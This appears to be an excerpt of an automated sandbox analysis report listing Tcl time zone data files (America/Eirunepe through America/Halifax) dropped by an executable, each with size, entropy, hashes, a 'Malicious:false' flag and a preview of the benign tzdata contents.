                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Eirunepe) {.. {-9223372036854775808 -16768 0 LMT}.. {-1767208832 -18000 0 -05}.. {-1206950400 -14400 1 -05}.. {-1191355200 -18000 0 -05}.. {-1175367600 -14400 1 -05}.. {-1159819200 -18000 0 -05}.. {-633812400 -14400 1 -05}.. {-622062000 -18000 0 -05}.. {-602276400 -14400 1 -05}.. {-591825600 -18000 0 -05}.. {-570740400 -14400 1 -05}.. {-560203200 -18000 0 -05}.. {-539118000 -14400 1 -05}.. {-531345600 -18000 0 -05}.. {-191358000 -14400 1 -05}.. {-184190400 -18000 0 -05}.. {-155156400 -14400 1 -05}.. {-150062400 -18000 0 -05}.. {-128890800 -14400 1 -05}.. {-121118400 -18000 0 -05}.. {-99946800 -14400 1 -05}.. {-89582400 -18000 0 -05}.. {-68410800 -14400 1 -05}.. {-57960000 -18000 0 -05}.. {499755600 -14400 1 -05}.. {511243200 -18000 0 -05}.. {530600400 -14400 1 -05}.. {540273600 -18000 0 -05}.. {562136400 -14400 1 -05}.. {571204800
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):279
                                                                                                                                                                                                                              Entropy (8bit):4.760311149376001
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/29078iPDm2OHvJ4YoHxHhgdrV/uF+IcmJ3/uF+ivNv:MB8629078AmdHx4YCJSB/uF+QV/uF+w9
                                                                                                                                                                                                                              MD5:CEF7277443EB6990E72C7EA7F79A122C
                                                                                                                                                                                                                              SHA1:1D3FEA364B3DC129DE3998A1455D5588EBAA6FF8
                                                                                                                                                                                                                              SHA-256:C02C6E79398553BD07BEA0BE4B7F0EBDD8BC821595909CFFB49DE4290A0D1D0F
                                                                                                                                                                                                                              SHA-512:E6FC530B2CCF010B8D38BC3F49A6859B5C68F4AB604E6305CE75FBE4FC9FF3FCD0187DEBEF6DAE652EEF9695568DBDE31F426E404CC3CC206D78183E0D919234
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/El_Salvador) {.. {-9223372036854775808 -21408 0 LMT}.. {-1546279392 -21600 0 CST}.. {547020000 -18000 1 CDT}.. {559717200 -21600 0 CST}.. {578469600 -18000 1 CDT}.. {591166800 -21600 0 CST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.836337676384058
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qfSfXHAIg20qfORL/2IAcGE7JM7QIAcGEqfBn:SlSWB9vsM3y7ekHAIgpeON/2907390eB
                                                                                                                                                                                                                              MD5:005D9C0E50291616A727CFB74A9FD37E
                                                                                                                                                                                                                              SHA1:846AE6720382B4F67B37B4256E45246C81DAF899
                                                                                                                                                                                                                              SHA-256:3E363BF82545F24CCE8CFA6EEC97BA6E1C2A7730B2A9CE6C48F784821D308A5D
                                                                                                                                                                                                                              SHA-512:452326D11D01825764BC40A77D17444D822F3AA202582233DD8B122798478FA83E3A27A02508EAC4CF0C7922AC2563742D773AA870562AE496B34FBB41FBAD63
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Tijuana)]} {.. LoadTimeZoneFile America/Tijuana..}..set TZData(:America/Ensenada) $TZData(:America/Tijuana)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4578
                                                                                                                                                                                                                              Entropy (8bit):3.8944281193962818
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5QIgsB/YRRvkGZ+R64CjSUlTG5Al5pj/A1ZFCARCeQbvb5+:6IgzR864CjSETG5sjgZkR/bvt+
                                                                                                                                                                                                                              MD5:4A4E023F635C4202018EA9E8F85B5047
                                                                                                                                                                                                                              SHA1:38E121FE2D419413E9E791B6C22BFC8D9F7554BC
                                                                                                                                                                                                                              SHA-256:AB15023807E7C7D1026C9970D190F1B405D48952464025242C2BB6C6BBB8391A
                                                                                                                                                                                                                              SHA-512:F10D21A2C841224879D1C817FC7F477DF582E1BC3603666B55199C098D51D1D5429F8C088C1083C07FC7588AE5C42A1DFBCC6B7C636AD1BE84ED657807A229E5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Fort_Nelson) {.. {-9223372036854775808 -29447 0 LMT}.. {-2713880953 -28800 0 PST}.. {-1632060000 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-757353600 -28800 0 PST}.. {-725817600 -28800 0 PST}.. {-715788000 -25200 1 PDT}.. {-702486000 -28800 0 PST}.. {-684338400 -25200 1 PDT}.. {-671036400 -28800 0 PST}.. {-652888800 -25200 1 PDT}.. {-639586800 -28800 0 PST}.. {-620834400 -25200 1 PDT}.. {-608137200 -28800 0 PST}.. {-589384800 -25200 1 PDT}.. {-576082800 -28800 0 PST}.. {-557935200 -25200 1 PDT}.. {-544633200 -28800 0 PST}.. {-526485600 -25200 1 PDT}.. {-513183600 -28800 0 PST}.. {-495036000 -25200 1 PDT}.. {-481734000 -28800 0 PST}.. {-463586400 -25200 1 PDT}.. {-450284400 -28800 0 PST}.. {-431532000 -25200 1 PDT}.. {-418230000 -28800 0 PST}.. {
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):231
                                                                                                                                                                                                                              Entropy (8bit):4.778858143786314
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y73GK7JHAIgp3GKZRN/290HXYAp4903GK8:MByMY3GK7Kp3GKnt290Hz4903GK8
                                                                                                                                                                                                                              MD5:24C369A3091452DCA7AAEBF4F48F5289
                                                                                                                                                                                                                              SHA1:2C2174CB16F490689E6FAC17B6D18F4A0DBD2DC9
                                                                                                                                                                                                                              SHA-256:C8948616262CF6990739343ABBBD237E572DB49310099E21DD8F9E317F7D11B3
                                                                                                                                                                                                                              SHA-512:80F579572754579706B4EEA49BF30456F3231A308E0616DC430E2428A04992412773421542E4F7FE4E4C7491BA88942FA44B49E87E95A2183211AC2AB523B231
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Indiana/Indianapolis)]} {.. LoadTimeZoneFile America/Indiana/Indianapolis..}..set TZData(:America/Fort_Wayne) $TZData(:America/Indiana/Indianapolis)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1423
                                                                                                                                                                                                                              Entropy (8bit):3.784027854102512
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5MeajcChlrLPsw6kSS3h5R14eH8tf3GvIkuoYVZaIBXR8nd:5rChlvEw6kSSx5H4a8tf3fkuoYVZDNRo
                                                                                                                                                                                                                              MD5:E7939C9A3F83D73B82A6DE359365EFD4
                                                                                                                                                                                                                              SHA1:06D6E257DA7C317CAFAF6C0B04567A2453CC1660
                                                                                                                                                                                                                              SHA-256:C0A836BDAF07F0376B7B0833A0AB3D52BA6E3E1D6F95E247E1AD351CD1096066
                                                                                                                                                                                                                              SHA-512:E2BEA04084489B26ADD9A768D2580C1FF7EBAC8A3EA36818F49E85FB14E01500D59D53904F5A17F4DABEF27B4CC2FC3F977EE4C125E5CE739BBE90C130ED3B07
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Fortaleza) {.. {-9223372036854775808 -9240 0 LMT}.. {-1767216360 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8372
                                                                                                                                                                                                                              Entropy (8bit):3.8225708746657316
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:w4lTPB10KvnpNWMPm4bPJWXtRbALtuFW4ng2CEBJuQaeEy9P19OBYEi/B51B7/BI:wKCC
                                                                                                                                                                                                                              MD5:1C8B0B85BB5578E84A4867546111F946
                                                                                                                                                                                                                              SHA1:E08A96F5B369FA53BC1F3F839EC14FF9D334F727
                                                                                                                                                                                                                              SHA-256:58C207CBD9DE7A7BB15E48A62CEA9F15DA184B945133DEE88EFF29FD8B66B29E
                                                                                                                                                                                                                              SHA-512:54CFBF208AB3E58AFB6BEC40265A452A3C4C684D7F278F51D6495FCA544652A1A5E05BC45F600911191B33C936E5D7D43A28FD2B0884AAB9F63B7AD5EFD574A1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Glace_Bay) {.. {-9223372036854775808 -14388 0 LMT}.. {-2131646412 -14400 0 AST}.. {-1632074400 -10800 1 ADT}.. {-1615143600 -14400 0 AST}.. {-880221600 -10800 1 AWT}.. {-769395600 -10800 1 APT}.. {-765399600 -14400 0 AST}.. {-536443200 -14400 0 AST}.. {-526500000 -10800 1 ADT}.. {-513198000 -14400 0 AST}.. {-504907200 -14400 0 AST}.. {63086400 -14400 0 AST}.. {73461600 -10800 1 ADT}.. {89182800 -14400 0 AST}.. {104911200 -10800 1 ADT}.. {120632400 -14400 0 AST}.. {126244800 -14400 0 AST}.. {136360800 -10800 1 ADT}.. {152082000 -14400 0 AST}.. {167810400 -10800 1 ADT}.. {183531600 -14400 0 AST}.. {199260000 -10800 1 ADT}.. {215586000 -14400 0 AST}.. {230709600 -10800 1 ADT}.. {247035600 -14400 0 AST}.. {262764000 -10800 1 ADT}.. {278485200 -14400 0 AST}.. {294213600 -10800 1 ADT}.. {309934800 -14400 0 AST}.. {325663200 -10800 1 ADT}
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):180
                                                                                                                                                                                                                              Entropy (8bit):4.973070790103308
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0wQbSeyXHAIg20wQboAFARL/2IAcGE5GZJ4IAcGEH:SlSWB9vsM3y7lbSeSHAIgplbLFAN/291
                                                                                                                                                                                                                              MD5:8263D2B39C2EC3B38A179F8BAD5972DD
                                                                                                                                                                                                                              SHA1:18D3462F6846768E16036E860DE90FB345C93047
                                                                                                                                                                                                                              SHA-256:5FB2CFBA25CE2F49D4C3911AFF8E7E1FF84EFC2D01F5783772E88246BFBC56AC
                                                                                                                                                                                                                              SHA-512:C175CAF972459759553001D48921268E9C6268CED56021BA6339F8CE3DD032DA6180E2B82974D3DCD0DC5F21566DFDBFBE1B6CF24E5E893F2335A449452DB27F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Nuuk)]} {.. LoadTimeZoneFile America/Nuuk..}..set TZData(:America/Godthab) $TZData(:America/Nuuk)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10353
                                                                                                                                                                                                                              Entropy (8bit):3.864463676759425
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:zfSacO8f7/ewzlrfFj18KvnpNWMPm4bPJvSuYUHgA0G19OBYEi/B51B7/Bm6BTdW:zfSacOI7/V3SuYUHgAuCC
                                                                                                                                                                                                                              MD5:0D646C67105FD0525E7CCC79585CE9DF
                                                                                                                                                                                                                              SHA1:06D91FDD8FEEDC299E40079569372F97A9AC6F04
                                                                                                                                                                                                                              SHA-256:52D2478289682BF95BFB93D64D679E888C9D23C0F68DFFF7E6E34BFC44B3D892
                                                                                                                                                                                                                              SHA-512:FD672613C2B65E12425415630A2F489917EB80DDED41338C9AA7D5D3C6B54E52C516A32493593F518DACF22A91D7A9D2C96DB9C5F1BE2C3BB9842D274BDC04FF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Goose_Bay) {.. {-9223372036854775808 -14500 0 LMT}.. {-2713895900 -12652 0 NST}.. {-1640982548 -12652 0 NST}.. {-1632076148 -9052 1 NDT}.. {-1615145348 -12652 0 NST}.. {-1609446548 -12652 0 NST}.. {-1096921748 -12600 0 NST}.. {-1072989000 -12600 0 NST}.. {-1061670600 -9000 1 NDT}.. {-1048973400 -12600 0 NST}.. {-1030221000 -9000 1 NDT}.. {-1017523800 -12600 0 NST}.. {-998771400 -9000 1 NDT}.. {-986074200 -12600 0 NST}.. {-966717000 -9000 1 NDT}.. {-954624600 -12600 0 NST}.. {-935267400 -9000 1 NDT}.. {-922570200 -12600 0 NST}.. {-903817800 -9000 1 NDT}.. {-891120600 -12600 0 NST}.. {-872368200 -9000 0 NWT}.. {-769395600 -9000 1 NPT}.. {-765401400 -12600 0 NST}.. {-757369800 -12600 0 NST}.. {-746044200 -9000 1 NDT}.. {-733347000 -12600 0 NST}.. {-714594600 -9000 1 NDT}.. {-701897400 -12600 0 NST}.. {-683145000 -9000 1 NDT}.. {-67044
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7522
                                                                                                                                                                                                                              Entropy (8bit):3.84007813579738
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:pGStCt/cL1BRv0HY2iU7KKdFL6Aa2K4gSLf8e:pvItOx0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:A17723CE27EC99D1506C45AB1531085B
                                                                                                                                                                                                                              SHA1:A83ED7BD09514A829CC8F2EA47BA113F5DCA1090
                                                                                                                                                                                                                              SHA-256:560B39485CED4C2A0E85A66EB875331E5879104187D92CB7F05C2F635E34AC99
                                                                                                                                                                                                                              SHA-512:110D1253D6915DB046247E4FD3BA9B881146BC3896DE779215E0CC6D1DCC59958C355441955509F5D38E3A3BA166DFD0F2F277000E9E89D6551FBEA0C16974B9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Grand_Turk) {.. {-9223372036854775808 -17072 0 LMT}.. {-2524504528 -18430 0 KMT}.. {-1827687170 -18000 0 EST}.. {284014800 -18000 0 EST}.. {294217200 -14400 1 EDT}.. {309938400 -18000 0 EST}.. {325666800 -14400 1 EDT}.. {341388000 -18000 0 EST}.. {357116400 -14400 1 EDT}.. {372837600 -18000 0 EST}.. {388566000 -14400 1 EDT}.. {404892000 -18000 0 EST}.. {420015600 -14400 1 EDT}.. {436341600 -18000 0 EST}.. {452070000 -14400 1 EDT}.. {467791200 -18000 0 EST}.. {483519600 -14400 1 EDT}.. {499240800 -18000 0 EST}.. {514969200 -14400 1 EDT}.. {530690400 -18000 0 EST}.. {544604400 -14400 1 EDT}.. {562140000 -18000 0 EST}.. {576054000 -14400 1 EDT}.. {594194400 -18000 0 EST}.. {607503600 -14400 1 EDT}.. {625644000 -18000 0 EST}.. {638953200 -14400 1 EDT}.. {657093600 -18000 0 EST}.. {671007600 -14400 1 EDT}.. {688543200 -18000 0 EST}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):201
                                                                                                                                                                                                                              Entropy (8bit):4.892013473075135
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/2905Qb90ppv:MByMYbpwt290Ob90b
                                                                                                                                                                                                                              MD5:4B9ABEA103F55509550F8B42D88E84B7
                                                                                                                                                                                                                              SHA1:E3AA1BCE5E260264E74F77E59C4071B7E496AB41
                                                                                                                                                                                                                              SHA-256:EBED070E8E67C5F12FF6E03FE508BE90789F17C793DFE61237B4045B8222580F
                                                                                                                                                                                                                              SHA-512:568E375464FF264C5048CB35995945BDE1D5BCC3A108B2A4D0F8389EBF18B4C58EBB1C2122F10BA777D512504A59C7EFDF6069EABD2A5DEA3189204B7F7A6EB4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Grenada) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):204
                                                                                                                                                                                                                              Entropy (8bit):4.9138787435596765
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/2905AJLr490ppv:MByMYbpwt290qJLr490b
                                                                                                                                                                                                                              MD5:92B091A06198E233B73DF12DFCD818D5
                                                                                                                                                                                                                              SHA1:C529488D09F86755E4F22CB4F0E3013C3A1B978D
                                                                                                                                                                                                                              SHA-256:6CB1930532831D12057FCB484C60DB64A60A4F6D8195DAFD464826923116A294
                                                                                                                                                                                                                              SHA-512:55EAE03CDECAC43BEDD3AA1A32C632A46808F29FF4D97A330F818544E4D10B9E9BA909D6627C38065EB7AC8E2C395FA37797F532CCFC8AB89D4698CCDE17F985
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Guadeloupe) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):399
                                                                                                                                                                                                                              Entropy (8bit):4.513185345162455
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862906GGmdHKznC972f/uF+mP/uF+K67Jqd3/uF+eBxE/uF+DAWNv:5neQCgfS+6S+K67Yd3S+e0S+1
                                                                                                                                                                                                                              MD5:569CDE7CE1AB84C0F16A25E85A418334
                                                                                                                                                                                                                              SHA1:EADE79AB6EDD98C7FE8B10B480C5C530CA014F5C
                                                                                                                                                                                                                              SHA-256:14F6A98D602F3648C816B110F3A0BA375E1FFE8FA06BEEAB419DC1ABFA6EDCAF
                                                                                                                                                                                                                              SHA-512:AE2ACBF09EED857906811BE2984D6BF92BF2955A9FE2F9F3FFEBB6790902F5C2C870F8561CA13AD9CB7826EECA434BED7CFE7D0D2739996BACEE506D0EB730DC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Guatemala) {.. {-9223372036854775808 -21724 0 LMT}.. {-1617040676 -21600 0 CST}.. {123055200 -18000 1 CDT}.. {130914000 -21600 0 CST}.. {422344800 -18000 1 CDT}.. {433054800 -21600 0 CST}.. {669708000 -18000 1 CDT}.. {684219600 -21600 0 CST}.. {1146376800 -18000 1 CDT}.. {1159678800 -21600 0 CST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):249
                                                                                                                                                                                                                              Entropy (8bit):4.745656594295655
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2905xDm2OHHjGeoHv5laITicKpKV0EX/uFhfF/KVg:MB86290jmdHHLCv5FT/gOR/uFpF/Og
                                                                                                                                                                                                                              MD5:DF661E312C6CE279CD6829120BE33CF2
                                                                                                                                                                                                                              SHA1:4ACDB31E27EF9175C5452BF95F94F9BC280A237F
                                                                                                                                                                                                                              SHA-256:6806AA5814BDC679C6EF653C518D2699114BE71D973F49C0864F622038DC2048
                                                                                                                                                                                                                              SHA-512:04E7FD01F4DAD981EE8A02487F4A889015C41D07D6DCF420183D387E2188FF3239E345B5D65FB195CA485F5C7B4AD8CFEF51FFFC11EE0C91F0C88FF7B7EF17C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Guayaquil) {.. {-9223372036854775808 -19160 0 LMT}.. {-2524502440 -18840 0 QMT}.. {-1230749160 -18000 0 -05}.. {722926800 -14400 1 -05}.. {728884800 -18000 0 -05}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):248
                                                                                                                                                                                                                              Entropy (8bit):4.673559445766137
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2905R3SDm2OHRLx5oH8ZOXFxSyZ1yV/KMMdVVFAKFZ4KVR/ON:MB86290LGmdHBnC8ZODhyV/4d/OeZ4Ke
                                                                                                                                                                                                                              MD5:F06C226D8D53EF8859AD91D7EBA5959C
                                                                                                                                                                                                                              SHA1:E0B4E6F4ADCB10F1D79FFD928E8684FFE0C0DC5F
                                                                                                                                                                                                                              SHA-256:4078D2E361D04A66F22F652E3810CDF7F630CF89399B47E4EC7B1D32B400FD85
                                                                                                                                                                                                                              SHA-512:B4385650A0C69B7BD66415CC4BB9FCA854DBB1427E9F2D6C1D8CDB8CCEF9ECBD699C66A83A9AC289DABC5CDBB0A2B044E4097E9A2977AE1802B3BF6E2BB518CF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Guyana) {.. {-9223372036854775808 -13959 0 LMT}.. {-1843589241 -14400 0 -04}.. {-1730577600 -13500 0 -0345}.. {176096700 -10800 0 -03}.. {701841600 -14400 0 -04}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11124
                                                                                                                                                                                                                              Entropy (8bit):3.8106487461849885
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:YpQamC9XD81iWQSufutTLBCN8RWnWQ7Z/xVpmtBwXiCDLxcGMe++wzlrfFj10Kvn:2kXCvNc/1/CC
                                                                                                                                                                                                                              MD5:6FB9E47841FF397CE36A36C8280E2089
                                                                                                                                                                                                                              SHA1:DA210300DC3D94FC3D8BA0A4531341BCA5C5936C
                                                                                                                                                                                                                              SHA-256:01E11C7B07925D05E9E1876C310A2B87E0E80EF115D062225212E472B7A964F1
                                                                                                                                                                                                                              SHA-512:F61B5A8A7532BBD54A4976DF17A1C6CF51BCC6DC396482FBE169C3081AF27B6CA863F0CDE3E483C59F5A5BD3365592F6984A97173C736B41D3CEEDAD4263A4E5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Halifax) {.. {-9223372036854775808 -15264 0 LMT}.. {-2131645536 -14400 0 AST}.. {-1696276800 -10800 1 ADT}.. {-1680469200 -14400 0 AST}.. {-1640980800 -14400 0 AST}.. {-1632074400 -10800 1 ADT}.. {-1615143600 -14400 0 AST}.. {-1609444800 -14400 0 AST}.. {-1566763200 -10800 1 ADT}.. {-1557090000 -14400 0 AST}.. {-1535486400 -10800 1 ADT}.. {-1524949200 -14400 0 AST}.. {-1504468800 -10800 1 ADT}.. {-1493413200 -14400 0 AST}.. {-1472414400 -10800 1 ADT}.. {-1461963600 -14400 0 AST}.. {-1440964800 -10800 1 ADT}.. {-1429390800 -14400 0 AST}.. {-1409515200 -10800 1 ADT}.. {-1396731600 -14400 0 AST}.. {-1376856000 -10800 1 ADT}.. {-1366491600 -14400 0 AST}.. {-1346616000 -10800 1 ADT}.. {-1333832400 -14400 0 AST}.. {-1313956800 -10800 1 ADT}.. {-1303678800 -14400 0 AST}.. {-1282507200 -10800 1 ADT}.. {-1272661200 -14400 0 AST}.. {-1251057600
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8729
                                                                                                                                                                                                                              Entropy (8bit):3.8227313494100867
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:BEsWduCtQA/gF6Y3Umjm67yLb5RCzhV28I:BBWACb/gF6Y3UmjBy7
                                                                                                                                                                                                                              MD5:564980AECB32F5778422EA15E8956879
                                                                                                                                                                                                                              SHA1:545209C95043721C1839CCE5FEFD1A6F2DE3FE5F
                                                                                                                                                                                                                              SHA-256:96B62BFBF0C05CF970245597C691F89EBF631175796459642A85287F131D0215
                                                                                                                                                                                                                              SHA-512:25FE5DAA55E3466EAE1CDC73918F189403C3360D4E82D72D745FA04A374DE04F479AA9811D6154FC70CC8EA620F18035EA6A3074116806D4405936FA017CE8E6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
